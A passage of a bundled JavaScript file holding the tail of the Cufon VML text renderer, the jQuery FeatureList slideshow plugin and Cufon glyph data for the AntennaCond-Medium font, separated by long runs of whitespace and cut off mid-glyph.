o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										   
/*
 * FeatureList - simple and easy creation of an interactive "Featured Items" widget
 * Examples and documentation at: http://jqueryglobe.com/article/feature_list/
 * Version: 1.0.0 (01/09/2009)
 * Copyright (c) 2009 jQueryGlobe
 * Licensed under the MIT License: http://en.wikipedia.org/wiki/MIT_License
 * Requires: jQuery v1.3+
*/
;(function($) {
	$.fn.featureList = function(options) {
		var tabs	= $(this);
		var output	= $(options.output);

		new jQuery.featureList(tabs, output, options);

		return this;	
	};

	$.featureList = function(tabs, output, options) {
		function slide(nr) {
			if (typeof nr == "undefined") {
				nr = visible_item + 1;
				nr = nr >= total_items ? 0 : nr;
			}

			tabs.removeClass('current').filter(":eq(" + nr + ")").addClass('current');

			output.stop(true, true).filter(":visible").fadeOut();
			output.filter(":eq(" + nr + ")").fadeIn(function() {
				visible_item = nr;	
			});
		}

		var options			= options || {}; 
		var total_items		= tabs.length;
		var visible_item	= options.start_item || 0;

		options.pause_on_hover		= options.pause_on_hover		|| true;
		options.transition_interval	= options.transition_interval	|| 5000;

		output.hide().eq( visible_item ).show();
		tabs.eq( visible_item ).addClass('current');

		tabs.mouseover(function() {
			if ($(this).hasClass('current')) {
				return false;	
			}

			slide( tabs.index( this) );
		});

		if (options.transition_interval > 0) {
			var timer = setInterval(function () {
				slide();
			}, options.transition_interval);

			if (options.pause_on_hover) {
				tabs.mouseenter(function() {
					clearInterval( timer );

				}).mouseleave(function() {
					clearInterval( timer );
					timer = setInterval(function () {
						slide();
					}, options.transition_interval);
				});
			}
		}
	};
})(jQuery);																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										   /*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © Font Bureau, Inc. | SWF-eXtract by uazero.
 * 
 * Trademark:
 * Please refer to the Copyright section for the font trademark attribution
 * notices.
 * 
 * Full name:
 * AntennaCond-Medium
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"134,-146v52,11,40,128,-4,141v-35,10,-95,6,-121,-11r19,-33v31,18,109,26,99,-34v4,-45,-37,-45,-82,-43r0,-35v38,0,79,5,75,-35v7,-51,-65,-38,-90,-23r-17,-33v45,-26,148,-36,148,46v0,33,-6,51,-27,60","w":183,"k":{"7":4,"4":1}},{"d":"41,0r-41,0r121,-267r41,0","w":161,"k":{"z":11,"y":7,"x":11,"w":7,"v":7,"u":14,"s":11,"r":14,"q":21,"p":14,"o":21,"n":14,"m":14,"g":21,"e":21,"d":21,"c":21,"a":21,"Q":7,"O":7,"J":32,"G":7,"C":7,"A":25,"9":7,"8":7,"7":-4,"6":11,"4":36,"2":4,"0":11,"\/":45,".":47,",":47}},{"d":"122,57r-89,0r0,-334r88,0r0,35r-47,0r0,265r48,0r0,34","w":147,"k":{"y":7,"v":7,"q":7,"o":7,"e":7,"d":7,"c":7,"Q":7,"O":7,"J":7,"G":7,"C":7,"A":4,"4":11}},{"d":"143,48r-154,-1r0,-30r154,0r0,31","w":131},{"d":"62,3v1,41,-17,56,-60,54r0,-33v17,1,19,-6,19,-23r0,-202r41,0r0,204xm61,-224r-41,0r0,-43r41,0r0,43","w":81},{"d":"59,-211r-33,0r40,-61r38,0r40,61r-33,0r-26,-33","w":171},{"d":"115,2v-32,0,-47,-5,-60,-20r-6,19r-30,-2r0,-275r40,0r0,93v11,-15,29,-21,57,-21v59,0,67,46,67,103v1,58,-10,103,-68,103xm60,-99v0,40,4,66,44,66v36,0,39,-30,39,-66v0,-37,-3,-68,-40,-68v-39,0,-43,28,-43,68","w":194,"k":{"}":7,"z":3,"y":5,"x":6,"w":4,"v":5,"s":2,"a":2,"]":7,"\\":21,"?":7,".":7,",":7,")":4}},{"d":"142,-139v55,22,51,140,-23,138r0,34v-13,-1,-29,2,-40,-1r0,-32v-29,-2,-51,-11,-68,-23r19,-30v25,21,115,38,110,-19v-6,-70,-121,-34,-118,-123v2,-43,18,-65,57,-71r0,-31r39,0r0,30v20,2,38,8,52,16r-18,33v-23,-15,-95,-25,-91,21v4,41,54,40,81,58","w":196},{"d":"124,-242v-34,-3,-52,4,-46,41r46,0r0,35r-46,0r0,166r-40,0r0,-166r-33,0r0,-35r32,0v-6,-60,23,-82,87,-76r0,35","w":126,"k":{"x":4,"s":1,"q":5,"o":4,"g":4,"e":4,"d":4,"c":4,"a":7,"\\":-14,"@":-2,"\/":7,".":11,",":11,"*":-11,"'":-11,"\"":-11}},{"d":"122,0r-42,0r0,-229r-74,0r0,-38r190,0r0,38r-74,0r0,229","w":200,"k":{"z":19,"y":15,"x":23,"w":14,"v":15,"u":21,"t":7,"s":32,"r":21,"q":37,"p":21,"o":37,"n":21,"m":21,"l":1,"k":1,"j":1,"i":1,"h":1,"g":37,"f":7,"e":37,"d":37,"c":37,"b":1,"a":30,"Z":1,"X":4,"S":5,"Q":9,"O":9,"J":36,"G":9,"C":9,"A":29,"@":5,";":9,":":9,"\/":21,".":29,",":29}},{"d":"113,-97r-100,0r0,-37r100,0r0,37","w":126,"k":{"z":1,"y":5,"x":11,"w":5,"v":5,"Z":1,"Y":14,"X":11,"W":7,"V":11,"T":18,"S":7,"J":18,"A":7,"7":18,"3":11,"2":11,"1":7}},{"d":"132,2v-14,-1,-32,2,-44,-1r-82,-268r43,0r62,208r61,-208r42,0","w":220,"k":{"z":20,"y":14,"x":21,"w":14,"v":14,"u":20,"t":11,"s":21,"r":20,"q":25,"p":20,"o":25,"n":20,"m":20,"l":1,"k":1,"j":7,"i":7,"h":1,"g":29,"f":11,"e":25,"d":25,"c":25,"b":1,"a":29,"Z":4,"X":7,"S":11,"Q":9,"O":9,"J":29,"G":9,"C":9,"A":20,"@":13,";":7,":":7,"\/":18,".":29,",":29}},{"d":"80,-205v28,0,50,4,60,20r6,-19r29,3r0,258r-40,0r0,-75v-11,16,-28,20,-57,20v-59,1,-66,-45,-66,-104v0,-59,11,-103,68,-103xm52,-101v0,39,5,69,39,69v39,0,44,-28,44,-69v0,-39,-5,-67,-44,-66v-35,1,-39,28,-39,66","w":194,"k":{"\\":14}},{"d":"175,0r-153,1r0,-267r153,0r0,38r-112,0r0,72r106,0r0,38r-106,0r0,81r112,0r0,37","w":191,"k":{"z":1,"y":4,"x":4,"w":4,"v":4,"t":4,"s":4,"q":4,"o":4,"g":4,"f":4,"e":4,"d":4,"c":4,"a":7,"Z":1,"X":1,"V":4,"U":2,"T":4,"S":5,"Q":4,"O":4,"G":4,"C":4,"A":4}},{"d":"74,57r-41,0r0,-334r41,0r0,334","w":106},{"d":"115,-34v42,0,54,-20,54,-60r0,-173r40,0v-3,75,10,167,-8,228v-9,31,-46,43,-86,43v-66,1,-95,-30,-95,-94r0,-177r42,0r0,173v-1,40,12,60,53,60","w":229,"k":{"a":4,"X":4,"S":4,"Q":2,"O":2,"J":11,"G":2,"C":2,"A":9,"\/":4,".":7,",":7}},{"d":"59,0r-39,0r0,-277r39,0r0,169r64,-93r44,0r-60,85r64,116r-43,0r-48,-84r-21,31r0,53","w":174,"k":{"z":1,"y":4,"w":2,"v":4,"u":4,"t":7,"s":5,"q":7,"o":9,"l":2,"g":5,"f":4,"e":9,"d":7,"c":9,"a":7,"\\":11,"@":4,"?":7}},{"d":"64,0r-42,0r0,-267r153,0r0,38r-111,0r0,76r105,0r0,38r-105,0r0,115","w":184,"k":{"z":7,"y":5,"x":9,"w":5,"v":5,"u":4,"t":4,"s":1,"r":4,"q":7,"p":4,"o":7,"n":4,"m":4,"g":7,"f":2,"e":7,"d":7,"c":7,"a":7,"Z":4,"X":6,"S":9,"Q":2,"O":2,"J":32,"G":2,"C":2,"A":21,"\/":29,".":21,",":21}},{"d":"0,0r0,0r0,0","w":63},{"d":"81,-111v59,29,-55,147,52,134r0,34v-52,4,-99,-5,-88,-67r12,-67v-1,-18,-15,-16,-37,-17r0,-34v65,8,23,-58,23,-103v0,-47,42,-47,90,-46r0,35v-24,0,-49,-2,-48,23v1,32,34,93,-4,108","w":158,"k":{"y":7,"v":7,"q":7,"o":7,"e":7,"d":7,"c":7,"Q":7,"O":7,"J":7,"G":7,"C":7,"A":4,"4":11}},{"d":"80,-205v28,0,43,5,55,19r0,-91r40,0r0,276r-32,2r-3,-20v-12,15,-33,20,-62,20v-59,0,-66,-45,-66,-103v0,-58,10,-103,68,-103xm52,-101v0,39,5,69,39,69v39,0,44,-28,44,-69v0,-39,-5,-67,-44,-66v-35,1,-39,28,-39,66","w":194},{"d":"20,0r0,-201r40,0r0,201r-40,0xm61,-224r-41,0r0,-43r41,0r0,43","w":81},{"d":"60,-55v0,16,6,20,24,20r0,36v-42,2,-64,-9,-64,-51r0,-227r40,0r0,222","w":95,"k":{"}":4,"y":2,"x":4,"w":2,"v":2,"u":5,"t":4,"s":4,"q":6,"o":6,"l":4,"j":4,"i":4,"g":4,"e":6,"d":6,"c":6,"a":5,"]":4,"@":1,"'":9,"\"":9}},{"d":"122,-262v-64,59,-64,246,-1,306r-30,19v-60,-53,-81,-222,-27,-306v10,-16,19,-29,28,-38","w":149,"k":{"q":4,"o":4,"e":4,"d":4,"c":4,"Q":4,"O":4,"J":4,"G":4,"C":4,"A":4,"4":11}},{"d":"101,-166v-69,0,-32,105,-41,166r-41,0r0,-198r32,-3r3,18v12,-16,29,-21,61,-21v92,0,49,124,59,204r-40,0r0,-122v0,-28,-4,-44,-33,-44","w":191,"k":{"y":3,"w":1,"v":3,"\\":14,"?":7}},{"d":"111,-68v3,59,-43,75,-102,67r0,-37v32,1,60,2,60,-32r0,-197r42,0r0,199","w":131,"k":{"J":4,"A":7,"\/":4,".":7,",":7}},{"d":"112,2v-13,-1,-30,2,-41,-1r-62,-268r42,0r44,190r45,-190r36,0r46,190r43,-190r40,0r-62,269r-41,0r-45,-184","w":314,"k":{"z":14,"y":11,"x":18,"w":11,"v":11,"u":17,"t":7,"s":14,"r":17,"q":21,"p":17,"o":21,"n":17,"m":17,"j":4,"i":4,"g":21,"f":7,"e":21,"d":21,"c":21,"a":25,"Z":2,"X":4,"S":7,"Q":5,"O":5,"J":25,"G":5,"C":5,"A":14,"@":10,";":4,":":4,"\/":11,".":25,",":25}},{"d":"28,-153r-2,-114r42,0r-2,114r-38,0xm134,-153r-37,0r-2,-114r42,0","w":162,"k":{"a":4,"X":6,"J":21,"A":18,"8":4,"4":14,"2":4,"1":-7}},{"d":"159,-219v-33,-19,-121,-20,-95,39v38,38,123,31,123,111v0,88,-124,82,-179,48r22,-32v24,19,120,38,116,-17v-6,-73,-127,-34,-127,-128v0,-79,100,-85,158,-57","w":198,"k":{"z":1,"y":9,"x":6,"w":7,"v":9,"u":1,"t":2,"r":1,"p":1,"n":1,"m":1,"g":4,"f":2,"a":1,"Z":4,"Y":7,"X":7,"W":4,"V":7,"U":4,"T":5,"S":7,"Q":4,"O":4,"J":5,"G":4,"C":4,"A":7,"?":4}},{"d":"41,-35v-15,-8,-13,-36,-4,-50v-14,-10,-22,-28,-22,-52v-1,-53,32,-72,88,-69r69,-12r0,32r-29,0v13,8,20,25,20,48v0,48,-27,65,-74,66r1,1v-9,0,-18,0,-25,-2v-4,19,6,21,28,21v48,0,81,3,81,52v0,49,-33,60,-84,60v-48,0,-83,-4,-84,-48v0,-26,13,-41,35,-47xm45,5v0,24,20,25,45,25v27,0,44,-3,44,-28v0,-24,-20,-23,-45,-23v-27,0,-43,3,-44,26xm55,-137v0,24,11,33,34,33v23,0,35,-9,35,-33v0,-24,-12,-33,-35,-33v-23,0,-34,9,-34,33","w":184,"k":{"z":1,"y":5,"x":5,"w":3,"v":5,"u":2,"t":2,"s":4,"q":5,"o":5,"l":1,"e":5,"d":5,"c":5,"a":4,"\\":7,"?":4}},{"d":"108,-141v-25,0,-51,-29,-63,2r-26,-15v10,-19,20,-33,44,-33v25,0,48,28,63,-2r26,15v-10,18,-20,33,-44,33","w":171},{"d":"172,0r-150,0r0,-266r42,0r0,229r108,0r0,37","w":177,"k":{"}":7,"y":18,"w":16,"v":18,"u":4,"t":7,"q":5,"o":5,"g":1,"f":7,"e":5,"d":5,"c":5,"a":4,"]":7,"\\":29,"Y":32,"X":4,"W":23,"V":29,"U":11,"T":29,"S":5,"Q":9,"O":9,"G":9,"C":9,"@":-4,"?":13,"*":36,")":4,"'":21,"\"":21}},{"d":"58,-281v79,64,78,282,-1,345r-29,-19v63,-62,64,-246,0,-307","w":149},{"d":"110,-270v99,0,92,107,85,197v-4,48,-32,75,-85,75v-81,0,-90,-58,-90,-135v0,-78,10,-137,90,-137xm110,-231v-66,-3,-48,100,-45,155v2,27,21,43,45,42v49,-2,48,-46,48,-99v0,-53,0,-95,-48,-98","w":218,"k":{"\\":11,"7":6,"3":2,"\/":11,".":4,",":4}},{"d":"202,-154v3,92,-2,160,-92,158v-81,-2,-98,-54,-99,-136v0,-86,21,-138,105,-137v31,-1,55,6,72,19r-22,34v-14,-8,-30,-14,-52,-14v-52,0,-61,39,-61,97v0,59,5,99,60,100v48,1,50,-35,49,-84r-59,0r0,-37r99,0","w":212,"k":{"}":7,"z":1,"y":4,"x":4,"w":4,"v":4,"t":1,"]":7,"\\":4,"Z":5,"Y":9,"X":10,"W":5,"V":6,"U":4,"T":12,"S":12,"J":11,"A":9,"\/":7,".":7,",":7,")":4}},{"d":"161,0r-41,0r-120,-267r40,0","w":161,"k":{"Y":21,"W":11,"V":18,"U":4,"T":21,"Q":7,"O":7,"G":7,"C":7,"9":4,"8":4,"7":14,"6":11,"4":7,"1":4,"0":11}},{"d":"123,-43r-38,0r0,-66r-55,0r0,-35r55,0r0,-67r38,0r0,67r56,0r0,35r-56,0r0,66","k":{"7":14,"3":4,"2":7,"1":7}},{"d":"111,-166v-77,-3,-44,99,-51,166v-13,-1,-29,2,-40,-1r0,-198r31,-3r4,21v11,-16,27,-22,56,-23r0,38","w":113,"k":{"y":-1,"w":-1,"v":-1,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":7,"\/":11,".":18,",":18,")":4}},{"d":"66,-153r-38,0r-1,-114r41,0","w":93,"k":{"a":4,"X":6,"J":21,"A":18,"8":4,"4":14,"2":4,"1":-7}},{"d":"124,0v-51,5,-87,-3,-87,-56r0,-110r-31,0r0,-35r33,0r6,-50r32,-7r0,57r47,0r0,35r-47,0r0,106v-3,27,21,26,47,25r0,35","w":137,"k":{"y":4,"x":4,"w":4,"v":4,"t":4,"q":7,"o":7,"g":4,"f":4,"e":7,"d":7,"c":7,"a":3,"\\":7,".":-4,",":-4,"'":2,"\"":2}},{"d":"178,-101v0,66,-19,105,-83,105v-63,0,-83,-39,-83,-104v0,-64,17,-104,83,-104v66,0,83,40,83,103xm95,-166v-58,0,-51,93,-28,125v4,7,20,9,28,9v38,0,42,-29,42,-67v0,-38,-3,-67,-42,-67","w":189,"k":{"}":7,"z":3,"y":5,"x":7,"w":4,"v":5,"s":2,"a":2,"]":7,"\\":21,"?":7,".":7,",":7,")":4}},{"d":"108,1r-43,0r-63,-202r42,0r44,149r42,-149r41,0","w":172,"k":{"}":7,"z":1,"x":4,"s":6,"q":5,"o":5,"g":7,"e":5,"d":5,"c":5,"a":7,"]":7,"\\":7,"@":4,".":18,",":18}},{"d":"99,-167v-67,1,-31,107,-40,167r-40,0r0,-199r32,-2r3,18v13,-28,97,-33,108,0v11,-17,30,-23,62,-23v48,0,57,28,56,74r0,131r-40,0r0,-122v0,-27,-2,-44,-31,-44v-35,0,-39,22,-39,59r0,107r-40,0r0,-121v0,-27,-2,-46,-31,-45","w":296,"k":{"y":3,"w":1,"v":3,"\\":14,"?":7}},{"d":"62,0r-40,0r0,-267r45,0r102,184r0,-184r40,0r0,267r-39,0r-108,-193r0,193","w":230},{"d":"118,-103v47,34,22,113,-42,106v-28,-3,-52,-4,-70,-14r15,-31v23,16,102,23,81,-24v-25,-30,-91,-24,-91,-82v0,-63,78,-67,125,-46r-15,33v-18,-8,-73,-20,-71,13v2,29,49,31,68,45","w":151,"k":{"z":1,"y":6,"x":6,"w":6,"v":6,"q":2,"o":2,"g":4,"f":2,"e":2,"d":2,"c":2,"a":1,"\\":11,"?":7}},{"d":"24,57r1,1r0,-33v23,2,39,-1,39,-24r-61,-202r41,0r41,144r41,-144r39,0r-68,222v-6,33,-34,38,-73,36","w":166,"k":{"}":7,"z":1,"x":4,"s":6,"q":5,"o":5,"g":7,"e":5,"d":5,"c":5,"a":7,"]":7,"\\":7,"@":4,".":18,",":18}},{"d":"193,-92v0,64,-21,96,-85,95r1,1v-100,10,-94,-94,-87,-183v5,-72,55,-94,139,-89r0,38v-62,-4,-103,9,-101,69v12,-15,34,-18,61,-19v57,-1,72,32,72,88xm109,-146v-54,0,-64,80,-31,107v6,5,17,6,30,6v38,2,44,-24,44,-59v0,-34,-9,-54,-43,-54","w":207,"k":{"\\":7,"9":7,"7":9,"3":4,"2":1,"\/":11,".":4,",":4,"'":4,"\"":4}},{"d":"95,-33v31,0,35,-15,35,-46r0,-122r40,0v-9,84,36,210,-76,204v0,0,1,-2,1,0v-104,10,-71,-114,-76,-204r40,0r0,122v0,30,5,46,36,46","w":188,"k":{"x":4,"g":2,"a":2,"\\":14,"?":7}},{"d":"115,57r-89,0r0,-34r47,0r0,-265r-46,0r0,-35r88,0r0,334","w":147},{"d":"188,-157v0,110,-24,169,-142,157r0,-36v62,4,105,-8,101,-69v-12,15,-33,19,-61,20v-56,0,-72,-33,-72,-89v0,-64,21,-97,85,-97v72,0,89,41,89,114xm55,-173v-1,35,11,55,43,55v31,0,50,-19,49,-54v0,-39,-8,-60,-48,-60v-38,0,-43,24,-44,59","w":207,"k":{"\\":11,"7":4,"3":2,"2":1,"\/":14,".":11,",":11}},{"d":"219,-133v0,83,-21,136,-104,136v-84,0,-104,-55,-104,-136v0,-81,20,-137,104,-137v83,0,104,54,104,137xm115,-230v-71,-2,-65,86,-58,148v4,30,27,49,58,48v55,0,63,-42,63,-98v0,-56,-8,-97,-63,-98","w":230,"k":{"}":7,"g":4,"a":4,"]":7,"\\":7,"Z":9,"Y":9,"X":12,"W":5,"V":9,"U":2,"T":9,"S":7,"J":11,"A":9,"\/":7,".":11,",":11,")":4}},{"d":"65,0r-47,0r0,-51r47,0r0,51","w":82,"k":{"y":18,"w":14,"v":18,"t":4,"q":7,"o":7,"l":4,"f":4,"e":7,"d":7,"c":7,"Y":32,"W":25,"V":29,"U":7,"T":29,"Q":11,"O":11,"G":11,"C":11,"9":14,"8":4,"7":14,"6":4,"4":12,"1":11,"0":4," ":4}},{"d":"142,-184v0,52,-15,87,-66,87v-51,1,-65,-34,-65,-87v0,-53,14,-86,65,-86v51,0,66,34,66,86xm47,-182v0,30,1,54,29,54v28,0,29,-24,29,-54v0,-30,-1,-54,-29,-54v-28,0,-29,24,-29,54xm341,-84v0,53,-14,86,-65,86v-51,0,-65,-33,-65,-86v0,-54,15,-87,65,-87v50,0,65,33,65,87xm247,-82v0,30,1,54,29,54v27,0,29,-24,29,-54v0,-31,-2,-54,-29,-54v-28,0,-29,24,-29,54xm135,0r-38,0r119,-267r38,0","w":351},{"d":"177,-88v1,65,-23,92,-86,91r1,2v-34,0,-60,-6,-81,-19r18,-33v37,20,119,28,107,-40v10,-57,-54,-63,-85,-40r-31,-9r7,-130r137,0r0,37r-103,0r-3,64v12,-7,28,-11,49,-11v55,0,70,31,70,88","w":190,"k":{"9":4,"7":7,"3":4,"2":1}},{"d":"30,-69r0,-37r149,0r0,37r-149,0xm179,-144r-149,0r0,-37r149,0r0,37","k":{"7":14,"2":7,"1":7}},{"d":"156,-147v45,9,46,94,21,126v-13,17,-39,24,-72,24v-59,1,-88,-23,-87,-78v0,-37,7,-62,35,-72v-22,-8,-28,-28,-28,-57v0,-48,28,-66,80,-66v52,0,80,18,80,66v0,28,-7,49,-29,57xm58,-81v0,32,11,49,46,49v34,0,46,-15,46,-49v0,-32,-13,-46,-46,-46v-33,0,-46,15,-46,46xm64,-198v0,26,12,37,40,37v27,0,40,-11,40,-37v0,-27,-13,-36,-40,-36v-27,-1,-40,9,-40,36","w":207,"k":{"\\":7,"9":4,"7":6,"3":4,"2":1,"\/":4,".":4,",":4,"'":4,"\"":4}},{"d":"121,-58r-109,0r0,-32r93,-177r43,0r-93,175r66,0r8,-79r30,0r0,79r34,0r0,34r-34,0r0,58r-38,0r0,-58","w":201,"k":{"\\":14,"9":4,"7":9,"5":4,"3":7,"2":1,"\/":4,"*":4,"'":7,"%":7,"\"":7}},{"d":"60,0r-37,0r0,-267r53,0r61,195r62,-195r53,0r0,267r-41,0r0,-189r-61,189r-29,0r-61,-189r0,189","w":274},{"d":"20,-151r0,-50r48,0r0,50r-48,0xm32,47r-11,-21v13,-7,21,-9,22,-26r-22,0r0,-51r47,0v1,45,5,88,-36,98","w":88,"k":{"Y":11,"W":4,"V":7,"T":9,"7":9}},{"d":"82,0r-43,0r78,-230r-110,0r0,-37r153,0r0,32","w":165,"k":{"\\":-7,"=":4,";":4,":":4,"8":2,"7":-4,"6":2,"4":11,"3":1,"2":1,"1":-4,"0":2,"\/":25,".":25,",":25,"'":-5,"\"":-5}},{"d":"165,-75r0,40r-134,-75r0,-29r134,-75r0,39r-92,50"},{"d":"197,-73v0,88,-92,73,-175,73r0,-265v78,1,174,-15,170,67v-1,32,-13,50,-34,59v27,9,39,29,39,66xm154,-77v0,-49,-45,-41,-90,-41r0,82v44,-1,90,9,90,-41xm150,-193v0,-46,-44,-38,-86,-38r0,76v42,0,86,8,86,-38","w":210,"k":{"\\":4,"Z":4,"Y":9,"X":6,"W":2,"V":4,"T":4,"S":4,"J":4,"A":5,"\/":4}},{"d":"65,-51v4,49,-1,90,-35,98r-12,-21v12,-7,22,-8,21,-26r-21,0r0,-51r47,0","w":82,"k":{"y":18,"w":14,"v":18,"t":4,"q":7,"o":7,"l":4,"f":4,"e":7,"d":7,"c":7,"Y":32,"W":25,"V":29,"U":7,"T":29,"Q":11,"O":11,"G":11,"C":11,"9":14,"8":4,"7":14,"6":4,"4":12,"1":11,"0":4," ":4}},{"d":"209,0v-15,-1,-33,2,-46,-1r-56,-102r-54,102r-45,0r78,-140r-71,-126r46,0r49,89r47,-89r45,0r-71,127","w":217,"k":{"y":11,"w":11,"v":11,"u":9,"t":11,"r":7,"q":17,"p":7,"o":17,"n":7,"m":7,"l":2,"g":7,"f":6,"e":17,"d":17,"c":17,"a":7,"Z":4,"Y":5,"W":4,"V":7,"U":4,"T":4,"S":11,"Q":12,"O":12,"G":12,"C":12,"A":7,"@":7,"?":4,"*":7,"'":6,"\"":6}},{"d":"70,-75v-9,-70,56,-72,62,-125v5,-45,-68,-33,-93,-19r-18,-34v46,-24,152,-33,152,45v0,69,-71,62,-64,133r-39,0xm112,0r-47,0r0,-46r47,0r0,46","w":192},{"d":"90,-270v88,-7,83,101,43,148v-21,24,-49,60,-71,86r104,0r0,36r-157,0r0,-32v36,-49,90,-85,110,-147v10,-29,-3,-55,-36,-53v-20,1,-39,5,-53,13r-18,-34v21,-11,44,-14,78,-17","w":183,"k":{"=":4,"<":7,"9":4,"7":6,"4":7,"2":4,"+":7}},{"d":"33,0r0,-51r48,0r0,51r-48,0xm76,-78r-36,0r-4,-189r44,0","w":114},{"d":"222,-162v-4,42,-12,83,-28,112r44,50r-50,0r-17,-20v-18,14,-40,22,-74,22v-56,0,-85,-22,-85,-75v-1,-42,26,-59,51,-77v-31,-37,-30,-121,41,-121v41,0,59,20,59,60v0,36,-23,55,-46,70r52,61v10,-26,12,-54,17,-86xm84,-123v-35,16,-50,91,13,91v23,0,38,-6,51,-16xm104,-236v-37,0,-20,53,-6,69v14,-10,27,-22,28,-44v-1,-15,-5,-25,-22,-25","w":246},{"d":"184,0r-174,0r0,-32r121,-196r-116,0r0,-38r166,0r0,34r-121,195r124,0r0,37","w":195,"k":{"y":12,"x":4,"w":11,"v":12,"u":4,"t":4,"r":4,"q":9,"p":4,"o":7,"n":4,"m":4,"g":1,"f":1,"e":9,"d":9,"c":9,"a":5,"Z":1,"X":4,"W":2,"V":4,"T":1,"S":5,"Q":9,"O":9,"G":9,"C":9,"A":4}},{"d":"101,-76v0,59,38,133,-45,133v-10,0,-23,-2,-31,1r0,-33v25,1,50,1,48,-25v-1,-34,-35,-93,4,-109v-39,-16,-6,-72,-5,-109v1,-25,-23,-24,-47,-23r0,-35v57,-4,101,6,87,66v-5,21,-12,44,-12,67v0,18,15,16,38,16r0,35v-23,0,-37,-2,-37,16","w":158},{"d":"87,0r-41,0r0,-230r-38,0r0,-37r79,0r0,267","w":117,"k":{"7":7,"4":4,"3":2,"2":4}},{"d":"167,0r-44,0r-41,-71r-38,71r-41,0r60,-105r-55,-96r44,0r35,62r34,-62r41,0r-55,97","w":169,"k":{"z":1,"y":4,"w":2,"v":4,"u":4,"t":4,"s":5,"q":6,"o":7,"g":7,"f":4,"e":7,"d":6,"c":7,"a":4,"\\":11,"@":4}},{"d":"96,1r-39,0r-53,-202r41,0r33,138r36,-138r37,0r35,137r33,-137r39,0r-52,202r-39,0r-36,-134","w":262,"k":{"z":1,"x":2,"s":6,"q":4,"o":4,"g":5,"e":4,"d":4,"c":4,"a":5,"\\":7,"@":4,".":14,",":14}},{"d":"105,-103r-32,0r4,-57r-43,31r-18,-30r49,-26r-49,-27r17,-28r44,31r-4,-58r33,0r-3,59r43,-33r18,29r-50,27r50,27r-18,29r-44,-31","w":178,"k":{"t":-4,"X":7,"J":21,"A":21,"4":7,".":50,",":50}},{"d":"177,-110r-134,74r0,-38r92,-50r-92,-51r0,-39r134,75r0,29","k":{"7":14,"3":7,"2":7,"1":11}},{"d":"199,-185v0,43,-17,71,-50,82r46,103r-43,0r-44,-98r-44,0r0,99r-41,0r0,-267r93,0v57,-1,82,26,83,81xm157,-183v6,-54,-45,-46,-93,-46r0,93v48,0,99,7,93,-47","w":213,"k":{"y":4,"v":4,"u":1,"s":4,"r":1,"q":5,"p":1,"o":5,"n":1,"m":1,"g":2,"e":5,"d":5,"c":5,"a":4,"Z":4,"Y":7,"X":4,"W":4,"V":4,"U":4,"T":5,"S":6,"Q":2,"O":2,"G":2,"C":2,"A":4,"@":1,"?":4,".":4,",":4}},{"d":"94,-32v23,0,38,-5,52,-12r15,31v-17,9,-42,14,-69,14v-65,0,-80,-39,-80,-104v0,-82,54,-124,123,-95v34,14,28,65,29,115r-114,0v2,32,11,51,44,51xm128,-117v0,-31,-3,-53,-36,-52v0,0,1,-2,1,0v-33,-1,-40,21,-42,52r77,0","w":176,"k":{"z":1,"y":1,"x":5,"w":1,"v":1,"f":4,"a":2,"\\":18,"V":18,"?":7,".":4,",":4}},{"d":"129,1v-3,30,23,27,51,26r0,36v-55,4,-99,-7,-90,-63v-63,-9,-77,-63,-78,-133v0,-81,20,-137,104,-137v83,0,104,54,104,137v0,77,-19,129,-91,134xm115,-230v-71,-2,-65,86,-58,148v4,30,27,49,58,48v55,0,63,-42,63,-98v0,-56,-8,-97,-63,-98","w":230,"k":{"}":7,"a":4,"]":7,"\\":7,"Z":9,"Y":9,"X":12,"W":5,"V":9,"U":2,"T":9,"S":7,"J":11,"A":9,"\/":7,".":11,",":11,")":4}},{"d":"71,0r-42,0r0,-267r42,0